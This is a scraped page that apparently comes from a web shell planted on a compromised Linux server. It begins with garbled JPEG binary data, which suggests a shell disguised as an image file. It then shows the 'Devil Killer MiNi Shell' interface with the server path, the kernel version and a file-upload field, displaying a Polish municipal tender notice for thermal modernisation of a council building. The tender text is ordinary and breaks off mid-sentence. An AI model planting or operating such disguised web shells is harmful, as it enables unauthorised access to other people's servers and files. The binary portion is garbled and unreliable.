JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220429/0014197401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Termomodernizacja budynku Urzędu Gminy&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CHRZYPSKO WIELKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259264</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Główna 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chrzypsko Wielkie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-412</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">srodkiunijne@chrzypsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chrzypsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Termomodernizacja budynku Urzędu Gminy&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6dc1ed9c-c6ec-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00141974</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037820/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Termomodernizacja budynku Urzędu Gminy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.chrzypsko.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski (inne niż oferta), zawiadomienia oraz informacje przekazywane są w przy użyciu:<br/>1) miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/<br/>2) ePUAPu, dostępnego pod adresem: /4fflau664z/zamowienia<br/>3) poczty elektronicznej (e-mail): srodkiunijne@chrzypsko.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. Pozostałe postanowienia zapisano w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z przepisami art. 13 i art. 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (dz. Urz. UE L 119 z 04.05.2016, str.1 ), (dalej „RODO”) Urząd Gminy Czarnków wypełnia ciążące na nim obowiązki wynikające z przepisów RODO, informując:<br/>Dane Administratora danych osobowych	Wójt Gminy Chrzypsko Wielkie z siedzibą Urzędu Gminy przy ul. Głównej 15, 64-412 Chrzypsko Wielkie, tel.: 61 29 51 011, fax: 61 62 10 890, e-mail: urzad@chrzypsko.pl<br/>Elektroniczna Skrzynka Podawcza https://epuap.gov.pl/wps/portal/strefa-klienta/katalog-spraw/profil-urzedu/4fflau664z<br/>Dane Inspektora ochrony danych osobowych Inspektor ochrony danych osobowych jest dostępny: <br/>a)	pisemnie - adres siedziby Administratora;<br/>b)	elektronicznie - adres e-mail: kontakt@smart-standards.com;<br/>c)	telefonicznie – nr tel. +48 602 24 12 39<br/>Podstawy prawne i cele przetwarzania danych osobowych	Podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 RODO.<br/>Przetwarzanie danych osobowych ma miejsce m.in. w następujących celach:<br/>1)	organizacji i udziału w postępowaniu o udzielenie zamówienia publicznego w celu dokonania wyboru oferty wykonawcy, z którym zostanie zawarta umowa w sprawie zamówienia publicznego, lub – w przypadku trybu zamówienia z wolnej ręki w celu wynegocjowania postanowień takiej umowy;<br/>2)	weryfikacji wiarygodności płatniczej i podatkowej kontrahenta [ustawa z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz.U.2020.106 t.j. z pózn. zm.)]<br/>– przez okres niezbędny do dokonania takiej oceny przy zawarciu, przedłużeniu lub rozszerzeniu zakresu umowy;<br/>Okres przetwarzania	Zgodnie z art. 78 ust. 1 ustawy Pzp zamawiający przechowuje protokół postępowania wraz z załącznikami przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a w przypadku prowadzenia postępowania w oparciu o narzędzia i urządzenia komunikacji elektronicznej udostępniane przez inny podmiot, zamawiający może powierzyć mu przechowywanie protokołu postępowania i załączników do tego protokołu <br/>w jego systemie teleinformatycznym, pod warunkiem przekazania zamawiającemu elektronicznej kopii wszystkich informacji i dokumentów związanych z takim postępowaniem. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>Prawa W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego uczestnikom postępowań o udzielenie zamówienia publicznego w trybie ustawy Pzp przysługują następujące uprawnienia:<br/>A.	prawo dostępu do danych osobowych oraz otrzymania ich kopii;<br/>B.	prawo udostępnienia danych osobowych z zastrzeżeniem z art. 18 ust. 5 Pzp, <br/>C.	prawo do sprostowania danych osobowych, z zastrzeżeniem z art. 19 ust. 2 Pzp; <br/>D.	prawo do ograniczenia przetwarzania danych osobowych z zastrzeżeniem z art. 19 ust. 3 Pzp ,<br/>E.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. <br/>Uczestnikom postępowań o udzielenie zamówienia publicznego w trybie ustawy Pzp nie przysługują:<br/>a)	prawo do usunięcia danych osobowych ( art. 17 ust. 3 lit. b, d lub e RODO);<br/>b)	prawo do przenoszenia danych osobowych (art. 20 RODO);<br/>c)	prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c w zw. z art. 23 RODO.<br/>Prawo do skargi	Jeśli uzna Pani/Pan, że przetwarzanie danych osobowych narusza obowiązujące przepisy prawa, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych z siedzibą przy ul. Stawki 2, 00-193 Warszawa, tel. 22 531 03 00.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FU.271.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia dla zadania:<br/>„Termomodernizacja budynku Urzędu Gminy w Chrzypsku Wielkim.”<br/>Zakres realizowanego projektu:<br/>Docieplenie budynku.<br/>Kody CPV:<br/>45100000-8 Przygotowanie terenu pod budowę<br/>45113000-2 Roboty na placu budowy<br/>45111220-6 Roboty w zakresie usuwania gruzu<br/>45210000-2 Roboty budowlane w zakresie budynków<br/>45260000-7 Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistyczne<br/>45262120-8 Wznoszenie rusztowań<br/>45262110-5 Demontaż rusztowań<br/>45262500-6 Roboty murarskie<br/>45262600-7 Różne specjalne roboty budowlane<br/>45321000-3 Izolacja cieplna<br/>45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych<br/>45421000-4 Roboty w zakresie stolarki budowlanej 45421160-3 Instalowanie wyrobów metalowych<br/>45431000-7 Kładzenie płytek<br/>45442100-8 Roboty malarskie<br/>45443000-4 Roboty elewacyjne<br/>45453000-7 Roboty remontowe i renowacyjne<br/>1. Opis zamówienia.<br/>Przedmiotem zamówienia jest wykonanie docieplenia budynku Urzędu Gminy w ramach jego termomodernizacji.<br/>2. Zakres elementów zadania:<br/>2.1. Wykonanie docieplenia ścian budynku przez usunięcie istniejącego (wraz z utylizacją) i położenie warstw styropianu fasadowego - wg systemu.<br/>2.2. Wymiana i uporządkowanie instalacji naelewacyjnych.<br/>2.3. Wykonanie docieplenia stropodachu (część płaska) przez położenie styropapy.<br/>2.4. Wykonanie docieplenia dachu i wykonaniu docieplenia tej część stropu przez montaż wełny mineralnej.<br/>2.5. Podwyższenie i przemurowanie kominów.<br/>2.6. Wykonanie dojść do kominów i urządzeń dachowych.<br/>2.7. Usunięcie istniejącego i wykonanie nowego orynnowania i obróbek blacharskich.<br/>2.8. Usunięcie istniejącej i wykonanie nowej instalacji odgromowej.<br/>2.9. Usunięcie istniejących daszków nadwejściowych i montaż nowych.<br/>2.10. Wymiana okien i drzwi parteru i piwnicy wraz z wykonaniem obróbki.<br/>2.11. Wymontowanie, odnowienie i montaż istniejących krat okiennych.<br/>2.12. Przełożenie istniejących i montaż brakujących rolet okiennych.<br/>2.13. Foliowanie okien.<br/>2.14. Oprócz uporządkowania i wymiany instalacji teletechnicznej, elektrycznej i antenowej na elewacjach, należy zamontować dwie anteny zbiorcze TV na dachu.<br/>2.15. Udrożnienie i wyczyszczenie kanałów kominowych i wentylacyjnych wraz z wykonaniem inspekcji kominiarskiej (przedłożyć protokół). Uzupełnić kratki wentylacyjne.<br/>2.16. Wykonanie napisów przestrzennych na elewacji.<br/>2.17. Zdemontowanie krat przy wejściu głównym oraz wykonanie przeszklenia wejściowego z drzwiami. Ponadto położenie płytek na podłodze, malowanie pomieszczenia i wymiana oświetlenia.<br/>Celem jest powstanie pomieszczenia dla interesantów.<br/>2.18. Wykonanie wykończenia murów oporowych pochylni poprzez pokrycie tynkiem silikatowym.<br/>2.21. Wykonanie tynku silikatowego na cokołach budynku.<br/>2.20. Należy zamontować kraty pomostowe i wentylacyjne doświetli piwnicy.<br/>2.21. Wykonanie dodatkowego odprowadzenia wód deszczowych z odwodnienia dachu.<br/>2.22. Przesunięcie szafki telekomunikacyjnej.<br/>Nie jest przedmiotem zamówienia (a jest ujęte w projekcie):<br/>1. Docieplenie i izolacja ścian piwnicznych poniżej poziomu terenu.<br/>2. Budowa schodów zewnętrznych – zejście do kotłowni. W to miejsce została wykonana pochylnia.<br/>3. Docieplenie stropodachu płaskiego metodą wtryskiwania.<br/>W to miejsce zostanie wykonane docieplenie na powierzchni stropodachu poprzez położenie styropapy (patrz: pkt 2.3).<br/>4. Wykonanie pokrycia cokołu płytkami klinkierowymi lub gresowymi. W to miejsce należy wykonać tynk silikatowy (patrz: pkt 2.29).<br/>7. Wykonanie obmurowania okien piwnicy i zamontowanie prefabrykowanych doświetli okien piwnic – zostało to wykonane.<br/>8. Wymiana okien w części mieszkalnej (piętro) budynku.<br/>9. Wykonanie i montaż drabiny zewnętrznej z kabłąkiem<br/>3. W wyniku powyższego powstanie:<br/>- Docieplenie budynku.<br/>- Nowe elewacje.<br/>- Daszki nad wejściami do budynku.<br/>- Stolarka okienna i drzwiowa parteru i przeszklenie frontowe.<br/>- Nowe pokrycie dachu.<br/>- Dojścia do kominów i urządzeń dachowych.<br/>- Orynnowanie i obróbki blacharskie.<br/>- Instalacja odgromowa.<br/>- Instalacja antenowa.<br/>4. Wytyczne dla wykonawcy:<br/>- wykonawca zobowiązany jest do dokonania wizji terenowej (na własny koszt) oraz do uzyskania wszelkich informacji niezbędnych do wyceny i wykonania tego zadania. Wizja terenowa powinna być odnotowana u zamawiającego.<br/>- przed zakupem potrzebnych elementów należy dokonać pomiarów z natury.<br/>- zamawiający wymaga, aby sposób prowadzenia zamówienia zapewniał utrzymanie ruchu i dojazd. Wykonawca zobowiązany jest do sporządzenia i przedłożenia zamawiającemu czasowego planu organizacji ruchu, jeżeli będzie to konieczne. Wszelkie opłaty wynikające ze szkód na etapie realizacji zamówienia ponosi wykonawca.<br/>5. Zasady zachowania konkurencyjności:<br/>- w przypadku, gdy w projekcie lub opisie przedmiotu zamówienia podano nazwy materiałów, produktów lub urządzeń konkretnych producentów, należy to traktować jako określenie żądanego standardu i jakości. - zamawiający dopuszcza rozwiązania równoważne opisanym. We wszystkich takich sytuacjach wykonawca może zaoferować równoważne materiały, produkty lub urządzenia o co najmniej takich samych parametrach. - wykonawca zobowiązany jest wykazać równoważność zastosowanych materiałów i rozwiązań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45262110-5 - Demontaż rusztowań</p> <p class="mb-0">45262120-8 - Wznoszenie rusztowań</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421160-3 - Instalowanie wyrobów metalowych</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena (C) – waga kryterium 100%<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 100 %<br/>CN *<br/>C = ------------- x 100 pkt x 100 %<br/>CO<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>gdzie :<br/>C - oznacza liczbę punktów uzyskanych w kryterium cena oferty brutto (z dokładnością<br/>do dwóch miejsc po przecinku), 1 % = 1 pkt<br/>CN - oznacza cenę brutto najtańszej z ofert,<br/>CO - oznacza cenę brutto ocenianej oferty.<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia dla zadania:<br/>„Termomodernizacja budynku Urzędu Gminy w Chrzypsku Wielkim.”<br/>Zakres realizowanego projektu:<br/>Instalacje elektryczne.<br/>Kody CPV:<br/>45311000-0 Roboty w zakresie okablowania oraz instalacji elektrycznych<br/>1. Opis zamówienia.<br/>Przedmiotem zamówienia jest wykonanie rozdzielni głównej, instalacji elektrycznej zasilania i sterowania instalacji klimatyzacji i grzewczej, instalacji zasilania rezerwowego, instalacji fotowoltaicznej oraz instalacji teletechnicznej LAN (w części administracyjnej) w ramach termomodernizacji budynku Urzędu Gminy.<br/>2. Zakres elementów zadania:<br/>2.1. Wykonanie instalacji elektrycznych związanych z instalacjami sanitarnymi: ogrzewania i kotłowni, klimatyzacji, ogrzewania wody.<br/>2.2. Modernizacja instalacji elektrycznej zasilania budynku – wymiana tablicy rozdzielni głównej.<br/>2.3. Zakup i montaż agregatu prądotwórczego 12kW bez przyczepy i wykonanie instalacji elektrycznej zasilania rezerwowego.<br/>2.4. Wykonanie instalacji fotowoltaicznej.<br/>2.5. Wykonanie instalacji teletechnicznej na kondygnacji parterowej budynku. Prace dot. modernizacji istniejących przewodów oraz uzupełnienia brakujących gniazd.<br/>3. W wyniku powyższego powstanie:<br/>- Instalacje elektryczne związane z instalacjami sanitarnymi: ogrzewania i kotłowni, klimatyzacji, ogrzewania wody. Modernizacja sieci w piwnicy.<br/>- Instalacja elektryczna zasilania budynku.<br/>- Instalacja elektryczna zasilania rezerwowego z agregatem prądotwórczym.<br/>- Instalacja fotowoltaiczna. - Instalacja teletechniczna na parterze budynku.<br/>4. Wytyczne dla wykonawcy:<br/>- wykonawca zobowiązany jest do dokonania wizji terenowej (na własny koszt) oraz do uzyskania wszelkich informacji niezbędnych do wyceny i wykonania tego zadania. Wizja terenowa powinna być odnotowana u zamawiającego.<br/>- przed zakupem potrzebnych elementów należy dokonać pomiarów z natury.<br/>- zamawiający wymaga, aby sposób prowadzenia zamówienia zapewniał utrzymanie ruchu i dojazd. Wykonawca zobowiązany jest do sporządzenia i przedłożenia zamawiającemu czasowego planu organizacji ruchu, jeżeli będzie to konieczne. Wszelkie opłaty wynikające ze szkód na etapie realizacji zamówienia ponosi wykonawca.<br/>- nie jest przedmiotem zamówienia a jest ujęte w przedmiarze:<br/>* zakup agregatu prądotwórczego 40 kW z przyczepą tylko zakup agregatu 12 kW bez przyczepy<br/>* wykonanie instalacji teletechnicznej na kondygnacji parterowej budynku nie oznacza całkowitej wymiany przewodów wielożyłowych tylko modernizacje istniejących przewodów oraz uzupełnienie brakujących gniazd.<br/>5. Zasady zachowania konkurencyjności:<br/>- w przypadku, gdy w projekcie lub opisie przedmiotu zamówienia podano nazwy materiałów, produktów lub urządzeń konkretnych producentów, należy to traktować 